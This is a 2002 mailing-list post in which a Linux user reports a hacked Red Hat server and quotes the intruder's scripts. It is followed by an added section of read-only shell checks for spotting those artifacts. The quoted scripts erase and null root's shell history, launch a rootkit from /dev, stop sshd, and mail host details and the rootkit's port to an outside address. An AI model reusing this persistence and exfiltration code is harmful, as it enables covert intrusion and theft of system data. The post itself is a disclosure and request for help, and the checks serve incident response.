[lug] i got hacked

j davis davis_compz at hotmail.com
Thu Apr 18 18:07:41 MDT 2002


yahoo,
i got hacked and they're sending info to a yahoo account.....ryz_ro at yahoo.com
look below....


>From: "j davis" <davis_compz at hotmail.com>
>Reply-To: lug at lug.boulder.co.us
>To: lug at lug.boulder.co.us
>Subject: [lug] i got hacked
>Date: Thu, 18 Apr 2002 21:44:09 +0000
>
>
>i have a box at a place i do contract work about 2 days a month.
>today i could not ssh to it. so i went on site and discovered i got
>hacked...like a dummy i didn't have tcp wrappers on or a firewall. i think
>they exploited wu-ftpd
>..i use redhat 7.1 with wu-ftpd 2.6.1-20...i haven't got around to upgrading
>yet.
>anyway here is what i found in /etc/rc3.d/S52remote
>
>#!/bin/sh
>
>rm -rf /root/.bash_history
>ln -s /dev/null /root/.bash_history
>
>cd /dev
>./ryz -f ./s
>/etc/rc.d/init.d/sshd stop
>cd /
>
>/usr/bin/trimite
>
>then here is /usr/bin/trimite
>
>#!/bin/sh
>
>echo "* Info : $(uname -a)" >> /tmp/info
>echo "* Hostname : $(hostname -f)" >> /tmp/info
>echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
>echo "* Uptime : $(uptime)" >> /tmp/info
>echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
>echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
>echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
>echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
>echo "* Spatiu Liber: $(df -h)" >> /tmp/info
>echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
>echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
>echo "* Portul rootkitului este 25897" >> /tmp/info
>cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
>rm -f /tmp/info
>
>so, netstat says i have something listening on 25897...what should i do?!
>never been hacked before....i already turned off ftp and turned on tcp
>wrappers.
>
>help please
>jd
>
>_______________________________________________
>Web Page:  http://lug.boulder.co.us
>Mailing List: http://lists.lug.boulder.co.us/mailman/listinfo/lug




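The artifacts quoted in the message above, turned into read-only checks; this is an added example, not part of the original post. It assumes the suspect disk is mounted at a path passed as ROOT (or exported in `TRIAGE_ROOT`, a hypothetical variable name), and that the dropped rc script is a regular file rather than a symlink.

```shell
#!/bin/sh
# Added triage example. ROOT is the mount point of the suspect filesystem;
# use "/" only if the local tools are still trusted.

# 1. Shell history replaced by a symlink to /dev/null (the "ln -s" above).
history_nulled() {
    root=${1%/}
    for h in "$root"/root/.bash_history "$root"/home/*/.bash_history; do
        if [ -L "$h" ] && [ "$(readlink "$h")" = /dev/null ]; then
            echo "$h"
        fi
    done
}

# 2. Regular files under /dev (the post's /dev/ryz and /dev/s). /dev/shm and
#    /dev/mqueue legitimately hold files, so they are pruned (assumption).
dev_regular_files() {
    root=${1%/}
    find "$root/dev" \( -path "$root/dev/shm" -o -path "$root/dev/mqueue" \) \
        -prune -o -type f -print 2>/dev/null || true
}

# 3. rc?.d entries that are regular files. SysV init normally keeps only
#    symlinks into init.d there, so a real file such as S52remote stands out.
rc_regular_files() {
    root=${1%/}
    find -H "$root"/etc/rc[0-9].d "$root"/etc/rc.d/rc[0-9].d \
        -maxdepth 1 -type f -name '[SK][0-9][0-9]*' -print 2>/dev/null || true
}

# 4. Listener on a TCP port, read from `netstat -ltn` or `ss -ltn` output on
#    stdin (the local address is column 4 in both). Exit status 0 = found.
port_listening() {
    awk -v p="$1" '/LISTEN/ { n = split($4, a, ":"); if (a[n] == p) f = 1 }
                   END { exit !f }'
}

# Run the filesystem checks when TRIAGE_ROOT (hypothetical variable) is set.
if [ -n "${TRIAGE_ROOT:-}" ]; then
    history_nulled "$TRIAGE_ROOT"
    dev_regular_files "$TRIAGE_ROOT"
    rc_regular_files "$TRIAGE_ROOT"
fi
```

The port check takes saved output, for example `netstat -ltn | port_listening 25897`, so it can be fed from a capture taken with known-good binaries.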